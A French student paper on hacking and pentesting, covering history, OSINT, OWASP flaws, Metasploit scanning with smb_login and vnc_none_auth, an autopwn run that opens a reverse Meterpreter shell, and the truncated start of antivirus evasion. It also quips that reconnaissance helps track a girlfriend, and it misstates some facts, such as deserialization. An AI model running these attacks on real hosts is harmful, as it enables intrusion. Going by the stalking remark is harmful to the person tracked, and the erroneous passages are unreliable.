Hacking

Télécharger au format pdf ou txt
Télécharger au format pdf ou txt
Vous êtes sur la page 1sur 33

HACKING : Tests d’intrusions et Sécurité

Ecrit par :
Nom : LOUKEBENE
Prénoms : Roll Hermel
Etudiant à l’Institut International (2i)
Option : Génie-Informatique
Filière : Réseaux et Télécommunications
Téléphone : 06-609-86-06
Adresse : Mpemba (Km4), Pointe-Noire
Introduction :

Lorsqu’on parle de « pirate », on ne pense pas forcément aux “pirates du net”.


Pourtant, ils sont bien présents dans le monde entier, et, en termes de hacking,
ils n’en sont pas à leur coup d’essai. On va s’intéresser ici plutôt au Hacking, donc
aux hackers. Nous allons pour cela recenser les différents types de hackers,
comprendre leurs intentions et leur fonctionnement, mais également nous
intéresser aux techniques qu’ils utilisent.

Historique du Hacking :

• Qu’est-ce que le Hacking ?

Selon John Draper, considéré comme le père du hacking, c’est « l’art de savoir
et de pouvoir modifier un programme ou une machine, de façon à ce qu’il fasse ce
que vous voulez qu’il fasse et non ce pour quoi il a été conçu ». Un hacker est
alors une personne qui recherche la maîtrise totale des outils qu’il utilise :
ordinateurs, logiciels, téléphones ou autres, pour en comprendre le
fonctionnement profond et qui n’hésite pas à le modifier pour l’adapter à ses
besoins.

1- Le Tech Model Railroad club :

En 1959 leTech Model Railroad Club (TMRC), une association d'étudiants du MIT
possédant comme son nom l'indique une maquette avec des trains électriques.
Pour la faire fonctionner, ils détournent la technologie de composants
électroniques dédiés par exemple à la téléphonie, et utilise le terme de hacking
pour définir leurs actions. Quelques années plus tard, le MIT se munit de son
premier ordinateur. Les membre du TMRC s'y intéressent et essayent de lui
faire faire de nouvelles tâches, en créant de nouveaux programmes par exemple.
Ils transposent leur mentalité de hacker à l'informatique. C'est le début du
Hacking.

2- Phreaking/ blue box :

Dans la pensée commune, le hacking commence avec l’intrusion dans les systèmes
informatiques, en réalité les premiers hackers sont des gens qui se sont
introduits dans le réseau téléphonique.

En 1957, Joe Engressia trouve le moyen de passer des appels gratuitement grâce
à un simple sifflotement.

Il se rend compte qu'en sifflant dans le récepteur du téléphone, la sonorité


reproduite permettait de signaler au serveur téléphonique que la ligne qu'il
utilise est libre et qu'il a raccroché alors que ce n'est pas le cas.
La légende urbaine veut que ce soit John Draper aka dit Captain Crunch qui
découvre cette technique en 1969 grâce à un simple sifflet trouvé dans un
paquet de céréale. C'est la naissance du phreaking, une contraction de phone et
de freak.

Pour simplifier son utilisation et être plus performant, Captain Crunch fabrique
un petit boîtier qui émet ce son correspondant à la fréquence 2600 hertz : la
bluebox.

Grâce à cet outil, la pratique du phreaking se démocratise et s'étend aux États-


Unis et dans le reste du monde.

Le réseau téléphonique devient pour les phreakers une sorte de réseau social, où
ils organisent des conférences téléphoniques, échangent sur leurs pratiques,...
Mais c'est surtout un nouveau terrain d'exploration pour les hackers en soif de
découvertes et d'accès à l'information. Ces derniers parviennent à s’immiscer
dans n'importe quels réseaux, en dupant les compagnies téléphoniques.

Ce sont les premiers à avoir développé une sensibilité et une démarche propre au
hacker informatique.

En 1971, un article de Ron Rosenbaum publié dans esquire met fin à l'âge d'or des
phreakers, avec cet article tout le monde veut se munir d'une bluebox, le réseau
téléphonique est envahi.

3- Législation à l’époque :

Des agents spécialisés de la compagnie de téléphone se rendent chez les hackers


pour faire pression sur leurs parents (beaucoup sont mineurs à l’époque).
Beaucoup d’avertissements de ce type sont réalisés. Les hackers désignent ces
agents en les appelant M. Duffy.

Ils rendent visite aux hackers pour les menacer (la dissuasion fonctionne
pendant quelques temps).

En parallèle, l’Etat américain prend des mesures informelles pour punir les
hackers. La possession d’une Bluebox peut conduire jusqu’à deux ans de prison.
Captain Crunch est inculpé par le FBI pour fraude électronique, il passe quatre
mois en prison. C’est la peine la plus lourde parmi les hackers puisque Captain
Crunch est considéré comme le pilier du système.

4- Le Home Brew Computer Club et l'arrivée des ordinateurs personnels :

En 1975 un groupe de passionné d'informatique et des micro-ordinateurs se


forme : c'est la création du Home Brew Computer Club, Ils se retrouvent pour la
première fois pour parler de l’Alter MIT et réfléchissent à de nouvelles
manières d'utiliser les ordinateurs.
Le groupe se retrouve tous les quinze jours pour discuter sur les techniques de
la programmation et de la fabrication des composants électroniques, ils
partagent leurs connaissances, leurs programmes.

L'échange d'information est primordial au sein du groupe, il y’a une sorte de


fierté de faire part de ses découvertes, de ses avancées. La mentalité du hacker
commence à prendre forme traduit par une importance du partage et de l'accès
total à l'information. Lee Felsenstein décrit d'ailleurs le Home Brew Computer
Club comme un repère de hacker avec un partage total d'information.

L'apparition des PC attire une génération de hacker passionné par l'accès à une
technologie informatique qu'ils peuvent enfin maîtrisée, transformée,...

Ils se mettent donc à fabriquer leurs propres ordinateurs, expérimentent de


nouvelles techniques.

Avec ces expérimentations, l'informatique connaît de réelles avancées, on


pensera notamment à Steve Vozniak le co-fondateur d'Apple (membre du HBCC)
Certains composants et programmes des ordinateurs ont pour source les
hackers.

5- Le chaos computer club (CCC)

Fondé en 1981, il rassemble une poignée des hackers passionnés par les réseaux
informatiques et la programmation. Ces derniers militent pour une liberté de
l'information totale et étudient la répercussion de la technologie sur la société.

Ils portent également un regard critique sur la concentration des informations


dans un même système ou sur le net. Comme par exemple la concentration
d’informations sur les différentes plates-formes de la Galaxie Google : Drive,
répertoire, boite mail, Google +...

Une réunion annuelle est organisée depuis 1984 entre noël et le nouvel an, le
'Chaos Communication Congres'

Ils s’attachent à mettre en évidence les failles des systèmes de sécurité des
entreprises et des administrations.

Leur action la plus connue est sûrement le ‘BTX-hack’ : en 1984 le CCC détourne
135.000 DM sur le compte en banque de la caisse d’épargne de Hambourg qui
utilisait le protocole BTX proclamé inviolable. Le lendemain, ils rendent la somme
dans son intégralité et montrent les failles de ce système de sécurité. Les
médias et la justice critiquent cette action qu’ils jugent illégale alors que le CCC
agit dans une logique totalement désintéressée.

En 2006 : Le CCC publie un rapport dans lequel il montre qu’il est facile de
manipuler les ordinateurs utilisés pour les élections. Le rapport est sérieusement
pris en compte par la cour constitutionnelle fédérale qui se penche sur le
problème. Depuis plusieurs municipalités ont renoncé à utiliser ces ordinateurs.

Le Home Brew Computer Club et le Chaos Computer Club, bien que très réputés
dans le monde informatique ne sont que deux groupes de hacker parmi tant
d’autres. Aujourd’hui il existe une multitude de groupes dont on ignore même
l'existence.

Les différents types des hackers :

Qu’est-ce qu’un hacker ?

Un hacker est une personne qui a des connaissances dans le domaine de la


sécurité informatique et qui a des compétences pour détecter des failles et
faiblesses des systèmes d’informations.

Après selon leurs intentions, vous avez principalement trois types de hackers :

1- Les black hât ou chapeau noir :

C’est une personne qui a des connaissances énormes en sécurité des systèmes
d’informations et qui s’introduit dans un système sans l’autorisation du
propriétaire. Ses intentions sont généralement malveillantes.

Ses raisons peuvent êtres par exemple de la vengeance ou à but financier.

2- Les whites hât ou chapeau blanc :

Ce n’est pas une personne qui hacke pour le bien comme j’ai souvent entendu ou
quand je lis souvent sur internet mais plutôt une personne qui a des compétences,
qui est parfois certifier et qui a des diplômes qui attestent de ses
connaissances.

Il est généralement employé en entreprise et son objectif est de détecter les


failles et faiblesses des systèmes d’informations avec l’accord écrit de la
direction de cette entreprise.

Il faut savoir que les Pen tester généralement n’utilisent même pas leurs scripts,
ils ne développent pas leurs applications ni leurs scripts. Ils ont des check listes,
ils se connectent sur leurs machines virtuelles ou bien leurs machines physiques,
ils se connectent ensuite sur le réseau de son entreprise qui a déjà prédéfinie
des scripts.

De là, ils peuvent juste exécuter ces scripts et noter les résultats qu’ils
enverront soit à la direction, soit à l’équipe de la sécurité de l’entreprise.
Les entreprises ne laissent pas la place à l’improvisation sur les techniques et les
méthodes utilisées. Généralement, les entreprises répondent à des normes. Je
pense aussi à la norme ISO 27001.

Donc il y’a des normes à respecter, des outils qui sont connus du client et les
whites hât par leurs connaissances sauront comment utilisés ces outils.

3- Les grey hât ou chapeau gris :

C’est une personne qui s’introduit par exemple dans un système d’information
sans autorisation du propriétaire des systèmes mais ses intentions ne sont pas
forcément mauvaises.

Il peut s’introduire par exemple dans un système d’information, il détecte les


failles et les faiblesses mais ne les exploites pas.

Ensuite il rédige un email au responsable de la sécurité des systèmes


d’informations en lui disant : « voici les failles et faiblesses que j’ai détecté sur
votre système.., voici comment vous pouvez y remédier…, si vous êtes intéressés
je pourrai travailler avec vous ? ».

Remarque :

Les black hât et les grey hât ont un objectif et ils vont tout faire pour atteindre
cet objectif.

Si Kali Linux a déjà les outils nécessaires, ils ont déjà Nmap par exemple pour
scanner le réseau. Vous pensez vraiment qu’ils vont se dire : « nous allons
attendre de développer notre application pour pouvoir effectuer un scanne sur le
réseau » ? Non !!!! Ils pourront à la limite développer un script qu’ils exploiteront
sur Nmap par exemple.

Connaitre sa victime :

Les criminelles sont souvent désigner comme étant des personnes organisées,
manipulatrices et sans scrupules. Mais comment obtiennent-ils des informations
sur leurs victimes ?

Lorsqu’on parle de hacking beaucoup des personnes grillent les étapes les plus
importantes pour passer directement à l’attaque.

1- Foot-Printing :

La première étape par laquelle passe les hackers avant d’attaquer une compagnie
est le foot-printing.
Qu’est-ce que le foot-printing ?

Lorsqu’on traduit littéralement en Français sa donne emprunte. Mais dans le


domaine informatique cela représente les traces et les informations que l’on peut
obtenir sur une victime.

Des exemples d’informations qu’on peut collecter : un site web, le nom d’une
personne, un numéro de téléphone, une adresse IP etc…

Toutes ces informations nous permettront d’avoir des potentielles cibles sur
lesquelles on pourra effectuer des pen test.

2- Social Engineering :

L’utilisation du social engineering permet d’avoir les informations beaucoup plus


précises et plus facilement. Pour rappel c’est une technique utilisée par les
hackers afin d’avoir certaines informations, pour cela ils essayent de manipuler
des personnes par téléphone, par email ou autres moyens en se faisant passer
pour la personne qu’ils ne sont pas.

3- Reconnaissance :

Pour répondre à la question que j’ai posée au début à savoir comment les
criminelles font pour choisir le bon moment, l’endroit et aussi ils savent à quel
moment un camion fera par exemple un déchargement des billets ? C’est grâce à
une méthode qu’on appelle la reconnaissance.

La reconnaissance est la base inter-militaire qui signifie la recherche active


d’une personne.

En informatique la reconnaissance est un procédé qui permet d’avoir des


informations sur sa cible : ses habitudes, comment, quand et où il fait des
choses. Méthode qui sera pratique pour pister sa copine.

Maintenant que vous connaissez le foot-printing et la reconnaissance, nous allons


passer aux outils utilisés.

En 2020 et plus le temps passera, il sera difficile de


désigner certains outils spécifiques au foot-printing.
Aujourd’hui tu peux utiliser des simples réseaux sociaux
afin d’avoir le maximum d’informations sur une personne.
Je pense évidemment à Facebook qui est le réseau social le
plus utilisé au monde. Mais selon les informations que vous
aurez, vous pouvez approfondir vos recherches grâce à
certains outils spécifiques, par exemple si vous avez le site
web d’une entreprise vous pouvez utiliser des outils tels que :
 nslookup : qui vous permettra d’obtenir des informations sur le serveur
DNS ainsi que l’adresse IP du serveur.

 Whois : avec whois vous obtiendrez des informations telles que : le nom du
serveur qui a hébergé le site, la date d’hébergement et dans certains cas
vous pouvez même obtenir le nom, l’email et le numéro de téléphone de la
personne qui a hébergé le site.

 Traceroute : on peut aussi tracer la route empruntée par un paquet ICMP


grâce à l’outil traceroute afin d’identifier les routeurs traversés et
déterminés l’emplacement des pare-feu.

On rappelle que le paquet ICMP (Internet Control Message Protocol) est envoyé
lorsqu’on effectue un ping.
En réalité comment fonctionne le ping ?

Lorsque vous effectuez un ping vers une machine de destination, un message


ICMP que l’on appelle Echo Request est envoyé et si la machine de destination
reçoit bien ce paquet elle répond avec un message Echo Reply. C’est comme ça
qu’on sait que la machine est disponible.

Ce que je reproche à beaucoup de personnes, c’est qu’ils se lancent dans le


hacking sans avoir même les bases de l’informatique. Les trois outils que je viens
de présenter vous seront utiles que si vous avez le site internet de l’entreprise
que vous ciblez.

Comme je l’ai dit précédemment un hacker peut utiliser du social engineering


pour avoir des informations en poussant sa victime à remplir un formulaire par
exemple ou via un appel téléphonique. Il peut aussi tracer un email qu’il aura
envoyé à la victime ainsi il pourra savoir si la victime l’a ouvert et obtenir son
adresse IP. Mailtracking (www.mailtracking.com ) est un outil qui vous permettra
d’effectuer cette tâche. Bref il existe plusieurs outils et méthode vous
permettront d’avoir des informations sur la victime.

4- L’art d’enquêter : OSINT

Cette partie nous concerne tous. Je vous ai présente le foot-printing en vous


expliquant ce que c’est le foot-printing.

Pour vous faire un résumé le foot-printing n’est que la première phase du cycle
du hacking durant laquelle on va recueillir le maximum d’informations sur un
système d’informations d’une entreprise ou d’une personne.

Maintenant nous allons parler d’OSINT, un sujet assez similaire au foot-printing.

OSINT pour Open Source Intelligence, fait référence à toutes les méthodes et
outils libres d’accès qui vous permettrons de recueillir le maximum d’informations
en utilisant par exemple les moteurs de recherches, les réseaux sociaux ou les
forums.

En gros on peut dire que c’est l’art d’enquêter mais attention ici Open Source ne
signifie pas gratuit mais accessible au grand public.

 Qu’est-ce que l’Open Source Intelligence ?

L’OSINT ou « Open Source Intelligence » signifie en français « Renseignement


de Source Ouverte ». Il s’agit d’une information accessible à tous et non
classifiée. L’Open Source Intelligence est un élément fondamental pour les
opérations de renseignements. Il peut par ailleurs contribuer à la discipline
émergente de mesures et signatures (MASINT), au contre-renseignement (CI)
ou à des opérations de sécurité (OPSEC).
Pour mieux comprendre la définition de l’OSINT, il faut savoir que le
renseignement sur Internet se découpe en quatre grandes parties :

 L’Open Source Data (OSD)

L’OSD correspond aux données de première impression : la diffusion et le


compte rendu oral d’informations à partir d’une source primaire. Il peut s’agir
d’une photographie, d’un enregistrement ou encore d’une lettre personnelle d’un
individu.

 L’Open Source Information (OSIF)

L’OSIF se compose de données pouvant être assemblées, généralement par un


processus éditorial qui assure le filtrage, la validation et la gestion de la
présentation. Cette information générique est souvent largement diffusée dans
les journaux, les livres ou rapports quotidiens.
 L’Open Source Intelligence (OSINT)

Comme indiqué précédemment, l’OSINT est une information qui a été


délibérément ouverte, diffusée à un public choisi pour répondre à une question
spécifique. Finalement, l’Open Source Intelligence applique le processus éprouvé
du renseignement aux multiples sources d’informations ouvertes.

 Validated OSINT (OSINT-V)

L’OSINT-V correspond à une information à laquelle à un haut degré de sécurité


peut être attribué. Celui-ci peut être produit par un professionnel du
renseignement ou une source ouverte.

 Qui utilise OSINT ?

Le gouvernement, les entreprises, les particuliers, les journalistes, le secteur


bancaire, les professionnels informatiques, les hackers, on a tous une bonne
raison d’utiliser OSINT.

En entreprise sa lui permet d’avoir un aperçu sur les concurrents, d’avoir une
visibilité sur ses potentiels clients ou bien voir ses futures collaborateurs.

Pour vous l’OSINT peut vous permettre d’avoir une idée sur les traces que vous
avez laissé en naviguant sur internet et de retirer ce que vous ne souhaitez pas
laisser.

Ce n’est encore rien par rapport à ce que l’OSINT peut permettre.

Pour vous donner un cas réel, France 24 en octobre 2019 présentait un


journaliste du nom d’Alexandre CAPRON qui parlait de l’OSINT et a expliqué
comment à l’aide des simples photos un enquêteur sur internet a réussi à trouver
l’emplacement exact où avaient été prises des photos de personnes qui faisaient
l’apologie du tourisme

Ce que je vous parle ne se résume pas qu’au hacking, C’est beaucoup plus
On a tous peut-être déjà utilisé truecaller lorsqu’on veut retrouver le nom d’un
propriétaire d’un numéro de téléphone. Bref voilà un outil d’accès au grand public
de façon gratuite que vous pouvez utiliser dans la vie de tout le jour.

 Quelles sont les étapes de l’OSINT ?


- La première étape est de définir ce qu’on a : un numéro de téléphone, une
adresse email, un nom d’utilisateur, l’information par laquelle on va
débuter.
- La deuxième étape consiste à planifier, à savoir ce qu’on va chercher, à se
poser les bonnes questions à savoir ce que vous cherchez et pourquoi vous
le cherchez ? une fois qu’on a répondu à ces questions on peut passer à
l’étape suivante.
- La troisième étape va vous permettre de se lancer dans la recherche, là
encore il faudra faire preuve de patience parce qu’il est fort probable que
vous ne trouvez rien de ce que vous désirez dès le début. Cela peut
prendre des jours, des semaines, des mois voire des années.
- La quatrième étape est de passer à l’analyse des données, de tout ce que
vous avez trouvé. C’est ce qui va vous permettre de savoir si vous avez la
réponse ou s’il faut que vous continuiez à faire des recherches.
- La cinquième étape est de se lancer à nouveau dans la recherche si vous
n’avez rien trouvé dans les étapes précédentes.
- La sixième et dernière étape est de clôturer votre travail

 Quels sont les outils utilisés pour l’OSINT ?

Le plus important c’est d’avoir un VPN et avoir Tor installé.


Pour rappel le réseau Tor est différent du VPN mais qui fonctionne de la même
façon.

Vous devrez passer par le réseau Tor avant d’accéder à un site web par exemple
et il aura pour conséquence de changer votre adresse IP et votre localisation.

 Se former à l’OSINT

Pour pratiquer l’Open Source Intelligence, il est essentiel de connaître certaines


techniques et méthodes de recherches sur Internet. L’utilisateur doit également
avoir les notions fondamentales relatives aux cybers menaces et à la protection
sur le Web. A l’ère du numérique, où l’utilisation d’Internet et des réseaux
sociaux est indispensable, il peut être intéressant de suivre une formation
OSINT pour protéger ses intérêts et éviter les dangers du Web

NB :

L’art d’enquêter est une passion que vous devriez avoir même si on vous donnait
tous les outils.

Le scanning :

Un scanner de vulnérabilité est un programme automatisé conçu pour rechercher


des faiblesses dans les ordinateurs, les systèmes informatiques, les réseaux et
les applications. Le programme sonde un système par l’envoi de données via un
réseau et analyse les réponses reçues, dans le but d’énumérer les vulnérabilités
présentes sur la cible en prenant pour référence sa base de données de
vulnérabilités.

Les systèmes d’exploitation ont tendance à réagir diversement lorsqu’ils


reçoivent des paquets réseaux particuliers en raison des différences
d’implémentation de leurs couches réseaux respectives. Ces réponses uniques
servent d’empreintes que le scanner de vulnérabilité utilise pour déterminer la
version du système d’exploitation et même son niveau de patch. Il peut
également utiliser un ensemble d’informations d’authentification pour se
connecter au système distant et l’énumération des logiciels et des services pour
déterminer s’ils sont patchés. Avec les résultats obtenus, le scanner présente un
rapport décrivant les vulnérabilités détectées sur le système et utile pour les
administrateurs réseau et les Pen testers.

Les scanners de vulnérabilité créent beaucoup de trafic sur un réseau et ne sont


donc généralement pas utilisés dans un test de pénétration lorsque l’un des
objectifs est de passer inaperçu. Si toutefois vous exécutez un test de
pénétration et que la furtivité n’est pas un problème, un scanner de vulnérabilité
peut vous éviter d’avoir à sonder manuellement les systèmes pour déterminer
leurs niveaux de patch et leurs vulnérabilités.
Que vous utilisiez un scanner automatique ou que vous le fassiez manuellement, le
scan est une des étapes les plus importantes dans le processus de tests de
pénétration. Réalisé de manière complète, il fournira le meilleur rendement pour
votre victime.

 Scanners de vulnérabilité spécialisés

Bien que de nombreux scanners de vulnérabilité commerciaux soient disponibles


sur le marché, vous n’êtes pas limité à ces services. Pour exécuter une analyse
spécifique pour une vulnérabilité sur le réseau, Metasploit dispose de nombreux
modules auxiliaires pouvant vous aider à accomplir ces tâches.

Les modules Metasploit suivants ne sont que quelques exemples des nombreux
modules de scan auxiliaires inclus dans le Framework. Profitez de votre
laboratoire pour sonder et explorer le plus grand nombre d’entre eux.

 Valider des connexions SMB (Server Message Block)

Pour vérifier la validité d’une combinaison nom d’utilisateur et mot de passe,


utilisez le SMB Login Check Scanner afin de vous connecter à une plage d’hôtes.
Comme on pouvait s’y attendre, ce scan est bruyant et visible, et chaque
tentative de connexion sera affichée dans les logs de chaque machine Windows
qu’il rencontre.

Après avoir sélectionné le module smb_login avec use, vous pouvez exécuter
show_options pour voir les paramètres énumérés dans la colonne Required.
Metasploit permet de spécifier un nom d’utilisateur et un mot de passe, une liste
d’identifiants et de mots de passe, ou une combinaison des deux. Dans l’exemple
suivant, RHOSTS est réglé sur une petite plage d’adresses IP tandis qu’un nom
d’utilisateur et un mot de passe sont configurés pour Metasploit pour essayer
contre toutes les adresses.

msf > use auxiliary/scanner/smb/smb_login

msf auxiliary(smb_login) > show options

msf auxiliary(smb_login) > set RHOSTS 192.168.1.150-155

RHOSTS => 192.168.1.170-192.168.1.175

msf auxiliary(smb_login) > set SMBUser Administrator

SMBUser => Administrator

msf auxiliary(smb_login) > set SMBPass s3cr3t

SMBPass => s3cr3t

msf auxiliary(smb_login) > run


[*] Starting host 192.168.1.154

[*] Starting host 192.168.1.150

[*] Starting host 192.168.1.152

[*] Starting host 192.168.1.151

[*] Starting host 192.168.1.153

[*] Starting host 192.168.1.155

❶ [+] 192.168.1.155 - SUCCESSFUL LOGIN (Windows 7)

’Administrator’ : ’s3cr3t’

[*] Scanned 4 of 6 hosts (066% complete)

[*] Scanned 5 of 6 hosts (083% complete)

[*] Scanned 6 of 6 hosts (100% complete)

[*] Auxiliary module execution completed

msf auxiliary(smb_login) >

Vous voyez une connexion réussie avec l’utilisateur Administrateur et un mot de


passe s3cr3t en ❶. Parce que tous les postes de travail sont clonés à partir
d’une image et déployés dans de nombreux environnements d’entreprise, le mot
de passe administrateur peut être le même sur chacun d’eux et vous donner
accès à tous les postes sur le réseau.

 Recherche d’accès VNC ouverts (Virtual Network Computing)

Le Virtual Network Computing (VNC) offre une interface graphique à des


systèmes distants d’une manière semblable à Remote Desktop de Microsoft. Les
installations VNC sont communes dans les entreprises car elles fournissent une
vue graphique d’un serveur et des postes de travail. VNC est souvent installé
pour répondre à un besoin temporaire puis complètement oublié et non mis à jour,
créant alors une vulnérabilité potentielle majeure. Le module VNC Authentication
None, scanner intégré à Metasploit, recherche dans une plage d’adresses IP les
serveurs VNC qui n’ont pas de mot de passe configuré (qui acceptent
l’authentification None, autrement dit un mot de passe vide). Habituellement,
cette analyse ne sert à rien, mais un bon Pen tester teste chaque piste quand il
recherche un moyen d’accéder à un système cible.

NB :

Les récents serveurs VNC n’autorisent pas des mots de passe vides. Pour en
créer un dans votre laboratoire, utilisez les anciens serveurs VNC comme
RealVNC 4.1.1.
Le scanner VNC, comme la plupart des modules Metasploit auxiliaires, est facile
à configurer et à exécuter. La seule configuration requise pour vnc_none_auth
est une adresse IP ou une plage d’adresses IP à analyser. Il suffit de
sélectionner le module, de définir vos RHOSTS et THREADS, si nécessaire, et
de l’exécuter.

msf > use auxiliary/scanner/vnc/vnc_none_auth

msf auxiliary(vnc_none_auth) > set RHOSTS 192.168.1.155

RHOSTS => 192.168.1.155

msf auxiliary(vnc_none_auth) > run

[*] 192.168.1.155:5900, VNC server protocol version : RFB 003.008

[*] 192.168.1.155:5900, VNC server security types supported :

None

❶ [*] 192.168.1.155:5900, VNC server security types includes None,

free access!

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

msf auxiliary(vnc_none_auth) >

Si vous avez de la chance et si Metasploit trouve un serveur VNC sans


authentification ❶, vous pouvez utiliser Back|Track vncviewer pour vous
connecter à la machine cible sans mot de passe.

 Utilisation des résultats de scan pour Autopwning

Faisons un rapide détour par l’exploitation. L’outil Autopwn de Metasploit cible et


exploite automatiquement un système utilisant un port ouvert ou utilise les
résultats d’une analyse de vulnérabilité. Vous pouvez utiliser Autopwn pour
exploiter les résultats de la plupart des scanners de vulnérabilité, y compris
NeXpose, Nessus et OpenVAS.

Par exemple, voici comment nous pourrions importer des résultats issus de
Nessus pour cibler un système et l’autopwn. Créez une nouvelle base de données
avec db_connect et utilisez db_import pour importer le rapport d’analyse. Dans
l’exemple suivant, nous exécutons db_autopwn avec une série de switches pour
lancer des attaques contre toutes les cibles (e), montrer tous les modules
utilisés (t), utiliser un reverse shell payload (r), sélectionner des modules basés
sur les vulnérabilités (x) et également basés sur des ports ouverts (p). Une fois
db_autopwn lancé, Metasploit commence à lancer des exploits aux cibles. Les
exploits réussis retournent un shell à la machine attaquante.

msf > db_connect postgres:[email protected]/msf3

msf > db_import /root/nessus.nbe

msf > db_autopwn –e –t –r -x –p

(1/72 [0 sessions]): Launching

❶ [*] exploit/windows/mssql/ms09_004_sp_replwritetovarbin against

192.168.33.130:1433...

[*] (2/72 [0 sessions]): Launching exploit/windows/smb/psexec

against 192.168.33.130:445...

[*] (3/72 [0 sessions]): Launching

exploit/windows/smb/ms06_040_netapi against

192.168.33.130:445...

[*] Transmitting intermediate stager for over-sized stage...(216 bytes)

[*] Sending stage (718336 bytes)

❷ [*] Meterpreter session 1 opened (192.168.1.101:40912 ->

192.168.1.115:15991)

[*] (72/72 [1 sessions]): Waiting on 2 launched modules to finish

execution...

[*] (72/72 [1 sessions]): Waiting on 0 launched modules to finish

execution...

Pour ces scans, Autopwn a lancé 72 exploits ❶ et un a réussi, comme indiqué en


❷.

NB :

Une mise en garde importante : lorsque vous utilisez Autopwn, le système cible
peut crasher ou perdre sa stabilité. Autopwn dispose de fonctionnalités non
exposées ici, comme la possibilité de sélectionner seulement les exploits
extrêmement bien classés, ce qui signifie qu’ils risquent très peu de planter le
système ou service distant. Pour plus d’informations sur son utilisation, entrez
db_autopwn –h.
Les vulnérabilités :

1- Les vulnérabilités web : OWASP

OWASP (Open Web Application Security Projet) est une organisation à but non
lucratif fondé en 2001 par Marc F.

L’objectif de cette organisation était de mettre en place gratuitement en 2017


des formations et outils qui vous permettrons de détecter les failles et
faiblesses de votre site afin d’y remédier.

Une étude menée par cette équipe en 2017 a pu déterminer quelles sont les dix
failles qui ont été les plus utilisées.

 Manque d’enregistrement et surveillances :

Que ça soit dans le développement web ou la mise en place d’un système


d’information, il faut toujours prévoir l’enregistrement d’évènements ou
l’enregistrement des journaux aussi appelés log.

En administration d’un réseau, on prévoit souvent un fichier log, s’il y’a une panne
on peut le consulter et détecter d’où provient la panne afin d’y remédier.

Dans ses études, OWASP a déterminé qu’une faille était détectée au niveau d’un
site après 200 jours.

 Utilisation de composants vulnérables :

Lors de la conception d’un site web, on utilisera forcement des bibliothèques, des
outils, des Framework.
 Qu’est-ce qu’un Framework ?

Il s’agit d’un programme ou un ensemble d’outils qui nous donnera le squelette de


notre application afin de faciliter son développement.

Si vous utilisez des Framework avec des failles déjà connues, ce sont des
potentielles portes que vous laissez ouvertes aux hackers.

Donc informez-vous sur les outils et les bibliothèques que vous utilisez.

 La dé-sérialisation non sécurisé :

La dé-sérialisation est le processus qui consiste à prendre des données en série


et les réunir en un seul bloc. Le problème est que si l’un des blocs contient une
erreur et vous ne la détectez pas, cette erreur va s’incruster lors de
l’association des blocs.

 Cross-site scripting :

Encore appelé XSS est une attaque qui consiste à injecter un contenu dans un
site afin que celui-ci soit exécuter par le navigateur. Les langages qui peuvent
être utilisés sont : le HTML, CSS ou le JavaScript.

 Mauvaise configuration de la sécurité :

Ça peut tous nous arriver de manquer une configuration lors du développement


d’un site web. Par contre, il y’a des points sur lesquels il faut faire très
attention.

Par défaut, le message d’erreur peut vous donnez le nom d’une variable, vous
donnez la ligne et même le nom de votre base de données.

Quand il s’agit d’effectuer une maintenance c’est bien mais d’un point de vue
sécurité il est conseillé de le personnaliser.

Les mauvaises configurations peuvent laisser des ports ouverts et peuvent même
laisser la possibilité d’effectuer des injections SQL. Elles peuvent avoir
plusieurs répercussions, c’est pourquoi il est important d’effecteur un suivi sur
son site ou encore plus lorsque vous l’hébergez ou le rendez public.
 Les droits d’accès :

Lors du développement d’une application web,


beaucoup font l’erreur de se lancer sur la partie
codage avant même d’effectuer une analyse
profonde.

L’analyse qu’elle soit Merise ou UML est très


importante, c’est à ce moment que vous allez
définir les acteurs de votre système et définir
quels sont les droits qui leurs sont octroyés. Il y’a des comptes qui ne doivent
absolument pas tomber entre les mains d’une personne malveillante, les comptes
administrateurs par exemple.

 XML : les entités externes

XML ou eXtensible Markup Language est un langage de balisage tout comme le


HTML. C’est grâce à des codes XML non sécurisés il est possible de récupérer
des fichiers, d’insérer des codes à distance et aussi même d’emmener une
attaque DOS.

 Les données sensibles non protégées :

OWASP a pu se rendre compte que plusieurs applications web ne protégeaient


pas correctement ses données sensibles. Pour renforcer la sécurité des données
sensibles on peut les chiffrer.

 Les failles d’authentifications :

La gestion d’authentification est primordiale. Aujourd’hui beaucoup de sites ont


des failles de sécurité parce qu’ils n’ont pas su gérer cette partie.

Si le login et le mot de passe correspondent à un utilisateur sur une base de


données on le redirige vers une seconde page sinon on le renvoi sur la page de
connexion en lui disant que le login ou le mot de passe est incorrect.

Le problème avec ce système, c’est qu’il n’y a pas de gestion de session à l’arrière
donc n’importe qui ayant l’URL de la deuxième page peut y accéder.

 L’injection SQL :

Même en 2017, l’attaque la plus utilisée était l’injection SQL. Pour rappel le
principe de l’injection SQL est d’injecter des requêtes SQL afin de récupérer
des données, les informations de la base de données.

2- Les vulnérabilités humaines :

Vulnérabilités Objectifs
Social engineering Exploite la confiance humaine et le comportement social

Phishing Déguise une invitation malveillante en quelque chose de légitime


Spear phishing Cible un groupe d’utilisateurs similaires

Whaling Cible les individus de haut niveau


Vishing Utilise les appels vocaux

Smishing Utilise les sms


Pharming Utilise des services légitimes pour envoyer des utilisateurs vers
un site compromis
Watering hole Cibles des victimes spécifiques qui visitent un site compromis
Comment contourner les anti-virus :

1- Qu’est-ce qu’un antivirus ?

C’est un programme qui permet de protéger un appareil


des logiciels malveillants tels que : les virus, les
trojans etc…

Il peut détecter, neutraliser et supprimer les logiciels


malveillants avant que ceux-ci affectent votre
ordinateur.

Pour détecter les logiciels malveillants, les anti-virus


se basent sur ce qu’on appelle la signature de celle-ci.

Lorsqu’un nouveau malware est détecté par les sociétés qui développent vos anti-
virus, ils enregistrent sa signature dans sa base de données et vous envoient une
mise à jour afin que votre ordinateur soit synchronisé avec leurs serveurs. C’est
pour cela que les mises à jour sont supers importantes.

2- Qu’elles sont les techniques utilisées :


 Zero day : qui signifie le jour zéro en Français

Il représente la période durant laquelle une vulnérabilité a été connue mais votre
système n’est pas protéger.

En 2017, la société Equifax, une société d’évaluation de code de crédit a subit un


cyber attaque qui a affecté les données de plus de cent quarante-trois millions
d’utilisateurs affectant des données telles que : les dates de naissances, les
numéros de sécurité sociale, les adresses personnelles.

Les hackers ont accéder aux données en profitant d’une faille qui était connue
sur l’une des applications web de l’entreprise.

Un correctif a été mis en place un mois avant cette attaque mais la société
n’avait pas effectuée la mise à jour.
Cette erreur les aura coûté plus de sept cent millions de dollar.

 Cacher la signature du malware :

Cette technique consiste à cacher la signature du malware afin que les anti-virus
